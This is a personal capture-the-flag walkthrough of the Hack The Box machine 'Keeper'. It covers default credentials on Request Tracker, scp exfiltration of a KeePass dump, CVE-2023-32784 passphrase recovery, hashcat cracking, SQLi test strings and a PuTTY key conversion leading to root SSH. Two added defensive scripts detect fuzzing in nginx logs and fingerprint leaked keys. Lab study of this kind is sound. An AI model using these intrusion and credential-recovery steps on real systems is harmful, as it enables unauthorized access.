# Lessons Learned

- Google default creds for web apps
- Look in every nook and cranny for disclosures/creds when we get access to an admin panel

---

# After-Action Attack Sequence

- BLUF: Thorough pillaging of `Request Tracker` admin panel; KeePass dump file exploit; convert PuTTY privkey to OpenSSH
- Access admin panel of Best Practical Request Tracker ver. 4.4.4 with default creds
- Find creds for `lnorgaard` buried within the admin panel
- Find KeePass db and dump file in `/home/lnorgaard`
- Google for a way to abuse a KeePass 2.x dump file > `CVE-2023-32784`
- Use the python version of the `CVE-2023-32784` PoC to uncover a partial passphrase for the KeePass db
- Google the partial match to find a Danish dessert with ø characters
- Use `kpcli` to open the KeePass db with the above passphrase
- Find a PuTTY privkey in `.ppk` format
- Clean up the `.ppk` and use `puttygen` to convert it to OpenSSH format
- SSH connect as `root`

---

# Discover Ports & Services

- `ping` test
![[images/Pasted image 20260417192328.png]]
- `nmap` scan - light
![[images/Pasted image 20260417192348.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260417192456.png]]
- `nmap` scan - UDP
![[images/Pasted image 20260417194611.png]]

---

# Service Enum

## Port 80 (HTTP): nginx 1.18.0

### `keeper.htb`

- Visit page
![[images/Pasted image 20260417192624.png]]
- Source
![[images/Pasted image 20260417192643.png]]
- `request:response`
![[images/Pasted image 20260417192719.png]]

### `tickets.keeper.htb/rt`

- Add to `/etc/hosts`
- Visit page > Request Tracker ver. 4.4.4
![[images/Pasted image 20260417193009.png]]
- Source
![[images/Pasted image 20260417193249.png]]
- Here we see `/rt/NoAuth/Login.html`
- `request:response`
![[images/Pasted image 20260417193400.png]]
- We have a cookie - test with a blank login
![[images/Pasted image 20260417194033.png]]
- Maybe the `next` parameter is an encoded IDOR vector?
### Fuzzing

- Directory fuzzing
![[images/Pasted image 20260417201541.png]]
- `/m/` for mobile > similar to `/rt/`
![[images/Pasted image 20260417193707.png]]
- Potential SQLi
![[images/Pasted image 20260417193910.png]]

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://tickets.keeper.htb/FUZZ -c -ic -fs 0,95
```

- Vhost fuzzing > nothing
![[images/Pasted image 20260417201657.png]]
- Subdomain fuzzing > nothing

### SQLi

- Manual SQLi tests > none of the below work

```bash
admin'
admin'-- -
admin' OR 1=1
admin' OR 1=1-- -
```

- Run `sqlmap` with a POST request against `/rt` > nothing

```bash
sqlmap -r request.txt --batch --dbms=mysql --technique=BEU --risk=3 --level=5
```

### Default Creds

- `admin:admin`
- `root:password` > from some Googling on Request Tracker 4.4.4
- We're in as `root`
![[images/Pasted image 20260417195623.png]]
- There is one open ticket
![[images/Pasted image 20260417195749.png]]
- Crash dump of `keepass` attached to the initial ticket, then removed by the sysadmin `lnorgaard` and saved to their home dir
- Maybe we can load a script to get a revshell as `www-data`, then crack the KeePass db?
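The defender's side of the Fuzzing and Default Creds sections above, as an added example (not from this writeup): `ffuf -fs 0,95` hides the 404s from the attacker's terminal, but nginx still logs every probe, and every default-credential guess is a POST to `/rt/NoAuth/Login.html`. The script below parses nginx combined-format access-log lines and flags a client that produces a burst of 404s in a short window or repeats login POSTs. The log lines are constructed here, the thresholds are assumptions to tune per environment, and the User-Agent check relies on ffuf's default `Fuzz Faster U Fool` string, which is trivially changed, so it is only a secondary signal.

```python
"""Added example: flag directory fuzzing and login guessing against Request
Tracker from nginx access logs. Sample lines are constructed, not real."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx "combined" log format (standard layout, nothing Keeper-specific).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/rt/NoAuth/Login.html"   # RT's login form, as seen in the writeup


def parse_line(line: str):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def bursty(timestamps, count: int, window: int) -> bool:
    """True if any `count` consecutive events fall within `window` seconds."""
    ts = sorted(timestamps)
    span = timedelta(seconds=window)
    return any(ts[i + count - 1] - ts[i] <= span for i in range(len(ts) - count + 1))


def detect(lines, notfound_count=20, notfound_window=60,
           login_count=5, login_window=300) -> dict:
    """Map client IP -> {'fuzzing': bool, 'login_guessing': bool} for noisy clients.
    Thresholds are assumptions; tune them to the site's normal traffic."""
    notfound = defaultdict(list)   # ip -> timestamps of 404 responses
    logins = defaultdict(list)     # ip -> timestamps of POSTs to the login form
    fuzz_ua = defaultdict(bool)    # ip -> seen ffuf's default User-Agent
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            notfound[rec["ip"]].append(rec["ts"])
        if rec["method"] == "POST" and rec["path"].split("?")[0] == LOGIN_PATH:
            logins[rec["ip"]].append(rec["ts"])
        if "fuzz faster" in rec["ua"].lower():
            fuzz_ua[rec["ip"]] = True
    findings = {}
    for ip in set(notfound) | set(logins) | set(fuzz_ua):
        f = {
            "fuzzing": bursty(notfound[ip], notfound_count, notfound_window) or fuzz_ua[ip],
            "login_guessing": bursty(logins[ip], login_count, login_window),
        }
        if any(f.values()):
            findings[ip] = f
    return findings


def sample_log() -> list:
    """Constructed nginx lines: one noisy client (10.10.14.5), one ordinary user (10.10.14.9)."""
    lines = []
    # 25 wordlist probes in 25 seconds, all 404, fuzzer User-Agent
    for i in range(25):
        lines.append(
            f'10.10.14.5 - - [17/Apr/2026:20:15:{i:02d} +0000] "GET /dir{i}/ HTTP/1.1" '
            f'404 162 "-" "Fuzz Faster U Fool v2.1.0"'
        )
    # six login POSTs spread over two and a half minutes from the same client
    for i in range(6):
        lines.append(
            f'10.10.14.5 - - [17/Apr/2026:20:{20 + i // 2}:{(i % 2) * 30:02d} +0000] '
            f'"POST {LOGIN_PATH} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
        )
    # an ordinary user: page view, one login, redirect back to /rt/
    lines += [
        '10.10.14.9 - - [17/Apr/2026:20:21:00 +0000] "GET /rt/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
        f'10.10.14.9 - - [17/Apr/2026:20:21:05 +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
        '10.10.14.9 - - [17/Apr/2026:20:21:06 +0000] "GET /rt/ HTTP/1.1" 200 8192 "http://tickets.keeper.htb/rt/" "Mozilla/5.0"',
    ]
    return lines


if __name__ == "__main__":
    for ip, flags in sorted(detect(sample_log()).items()):
        print(ip, flags)
```

Run against a real log with `detect(open("/var/log/nginx/access.log"))`; the point of the 404-burst rule is that it is independent of the fuzzer's User-Agent, while the login rule catches default-credential guessing whether or not any guess succeeds.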
- Look for authenticated RCEs - no PoCs found from Googling
- `searchsploit`
![[images/Pasted image 20260417202409.png]]
- Comment field for `lnorgaard` has a password
![[images/Pasted image 20260417203102.png]]

---

# Shell as `lnorgaard`

- `ssh` into target with creds for `lnorgaard`
![[images/Pasted image 20260417203238.png]]
- Let's exfil this ZIP, I assume it's the KeePass db

```bash
scp [email protected]:/home/lnorgaard/RT30000.zip ~/Documents/htb/boxes/keeper/RT30000.zip
```

![[images/Pasted image 20260417203542.png]]
- Unzip and inspect
![[images/Pasted image 20260417203626.png]]

## Brute force `keepass` passphrase

- Run `keepass2john` and attempt to crack with `-m 13400`

```bash
keepass2john passcodes.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /opt/rockyou.txt
```

- This is taking too long
- Let's Google: "keepass 2.x exploits"
- Found CVE-2023-32784, which exploits a KeePass 2.x dump file, which is what we have
  - https://github.com/vdohney/keepass-password-dumper uses .NET
  - https://github.com/matro7sh/keepass-dump-masterkey uses python - notes that the first character will be missing
  - https://github.com/ynuwenhof/keedump uses rust

## `CVE-2023-32784` .NET exploit

- Install .NET

```bash
wget https://packages.microsoft.com/config/debian/13/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb   # install signing key
rm packages-microsoft-prod.deb
sudo apt-get update && sudo apt-get install -y dotnet-sdk-10.0           # .NET SDK
sudo apt-get update && sudo apt-get install -y aspnetcore-runtime-10.0   # .NET runtime
git clone https://github.com/vdohney/keepass-password-dumper
cd ./keepass-password-dumper
dotnet run ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp
```

- Looks like the PoC is using .NET 7.0, but I downloaded 10.0
![[images/Pasted image 20260417211347.png]]
- Come back to this later if the rust and python versions do not work

## `CVE-2023-32784` rust exploit

```bash
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install cargo
cargo install keedump
git clone https://github.com/ynuwenhof/keedump.git
cd keedump
cargo install --path .
# single quotes so $HOME and $PATH are written literally and expanded when .bashrc is sourced
echo 'export PATH="$HOME/.cargo/bin:$PATH"' >> ~/.bashrc
source ~/.bashrc
echo $PATH   # confirm
keedump -i ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp
```

- Illegible
![[images/Pasted image 20260417205521.png]]

## `strings`

- Way too many lines
![[images/Pasted image 20260417212022.png]]
- Try to pipe into grep
![[images/Pasted image 20260417212031.png]]

## `CVE-2023-32784` python exploit

- Still getting garbage output
![[images/Pasted image 20260417210213.png]]
- Google the output > we see a Danish porridge with a unique character that was not displayed in the above output
![[images/Pasted image 20260417213007.png]]

## Open `.kdbx` with `kpcli`

- Now download `kpcli` and open the db

```bash
sudo apt install -y kpcli
kpcli
open passcodes.kdbx   # at the kpcli prompt
```

- `passwords/Network` has 2 entries
![[images/Pasted image 20260417213752.png]]
- Entry 0 has a hidden password and a PuTTY privkey
![[images/Pasted image 20260417213849.png]]
- After some Googling, we can use `-f` to reverse the redaction
- Use `su root` to privesc with the revealed password > fails

## Convert priv key from PuTTY to OpenSSH format

- Now create a `.ppk` and clean it up (every pasted line starts with a space)

```bash
sed 's/^ //g' key.ppk > key2.ppk
```

![[images/Pasted image 20260418180629.png]]
- Convert `.ppk` to OpenSSH

```bash
sudo apt-get install putty-tools
puttygen key2.ppk -O private-openssh -o id_rsa   # -O specifies the output format
chmod 600 id_rsa
```

![[images/Pasted image 20260418180836.png]]

---

# Shell as `root`

- Login as `root` with `id_rsa`
![[images/Pasted image 20260418180930.png]]
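The `.ppk` clean-up and conversion section above relies on `sed` and `puttygen` without showing what the file actually contains. As an added example (not from this writeup or the PuTTY project), the parser below reads the PuTTY private-key format from the defender's side: it applies the same leading-space clean-up the `sed` step does, checks the `Public-Lines`/`Private-Lines` counts and header consistency, reports whether the key is stored with `Encryption: none` (which is what made the KeePass entry an instant root login), and derives the OpenSSH `authorized_keys` line and SHA256 fingerprint so a responder can grep hosts and auth logs for everywhere a leaked key is trusted. The key material is constructed and is not a real key; the `Private-MAC` is not verified, since that needs PuTTY's key-derivation step.

```python
"""Added example: parse and sanity-check a PuTTY .ppk file (v2/v3 layout).
The sample key is constructed inline and is not a real key."""
import base64
import hashlib
import re
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """SSH wire 'mpint' for a non-negative integer (leading zero if the top bit is set)."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def _wrap64(s: str) -> list:
    return [s[i:i + 64] for i in range(0, len(s), 64)]


def build_sample_ppk(indent: str = " ") -> str:
    """Constructed PPK v2 text with a fake ssh-rsa key; every line is prefixed
    with `indent` to mimic the pasted-with-leading-space file the writeup fixed."""
    fake_modulus = int.from_bytes(bytes(range(1, 65)), "big")   # constructed, not a real key
    pub_blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(65537) + _ssh_mpint(fake_modulus)
    priv_blob = b"constructed-private-blob-not-a-real-key" * 3
    pub_lines = _wrap64(base64.b64encode(pub_blob).decode())
    priv_lines = _wrap64(base64.b64encode(priv_blob).decode())
    lines = [
        "PuTTY-User-Key-File-2: ssh-rsa",
        "Encryption: none",
        "Comment: rsa-key-constructed",
        f"Public-Lines: {len(pub_lines)}", *pub_lines,
        f"Private-Lines: {len(priv_lines)}", *priv_lines,
        "Private-MAC: " + "00" * 20,   # placeholder, not verified here
    ]
    return "\n".join(indent + ln for ln in lines) + "\n"


def parse_ppk(text: str) -> dict:
    """Parse a PPK file; raises ValueError when the structure is inconsistent."""
    # Same clean-up as `sed 's/^ //g'`: strip surrounding whitespace, drop blank lines.
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty input")
    m = re.match(r"^PuTTY-User-Key-File-(\d+): (\S+)$", lines[0])
    if not m:
        raise ValueError("not a PuTTY private key file")
    info = {"version": int(m.group(1)), "algorithm": m.group(2),
            "encryption": "", "comment": "", "issues": []}
    i = 1
    while i < len(lines) and not lines[i].startswith("Public-Lines:"):
        key, sep, value = lines[i].partition(": ")
        if not sep:
            raise ValueError(f"malformed header line: {lines[i]!r}")
        info[key.lower()] = value          # Encryption, Comment, (v3: Key-Derivation, ...)
        i += 1

    def read_block(label: str, idx: int):
        """Read 'Label: N' followed by N base64 lines; return (decoded bytes, next index)."""
        if idx >= len(lines):
            raise ValueError(f"missing {label}")
        key, _, count = lines[idx].partition(": ")
        if key != label or not count.isdigit():
            raise ValueError(f"expected '{label}: N', got {lines[idx]!r}")
        n = int(count)
        body = lines[idx + 1: idx + 1 + n]
        if len(body) != n:
            raise ValueError(f"{label} promises {n} lines, found {len(body)}")
        return base64.b64decode("".join(body), validate=True), idx + 1 + n

    info["public_blob"], i = read_block("Public-Lines", i)
    priv, i = read_block("Private-Lines", i)
    info["private_blob_len"] = len(priv)
    if i >= len(lines) or not lines[i].startswith("Private-MAC: "):
        raise ValueError("missing Private-MAC line")
    info["mac"] = lines[i].split(": ", 1)[1]
    # The public blob opens with an SSH string naming the algorithm; it must match the header.
    alg_len = struct.unpack(">I", info["public_blob"][:4])[0]
    if info["public_blob"][4:4 + alg_len] != info["algorithm"].encode():
        raise ValueError("public blob algorithm does not match header")
    if info["encryption"] == "none":
        info["issues"].append("private key is stored unencrypted (Encryption: none)")
    return info


def is_well_formed(text: str) -> bool:
    try:
        parse_ppk(text)
        return True
    except ValueError:
        return False


def openssh_public_line(info: dict) -> str:
    """authorized_keys form of the key: grep hosts for it to see where it is trusted."""
    b64 = base64.b64encode(info["public_blob"]).decode()
    return f"{info['algorithm']} {b64} {info['comment']}".rstrip()


def fingerprint(public_blob: bytes) -> str:
    """The SHA256 fingerprint `ssh-keygen -lf` prints: base64 of the digest, '=' padding dropped."""
    digest = hashlib.sha256(public_blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


if __name__ == "__main__":
    key = parse_ppk(build_sample_ppk())
    print(key["algorithm"], key["encryption"], fingerprint(key["public_blob"]))
    for issue in key["issues"]:
        print("issue:", issue)
```

The fingerprint matches what `ssh-keygen -lf` reports for the converted `id_rsa`, so it can be searched for directly in `sshd` logs (`Accepted publickey ... SHA256:...`) to see which hosts and accounts the leaked key has been used against.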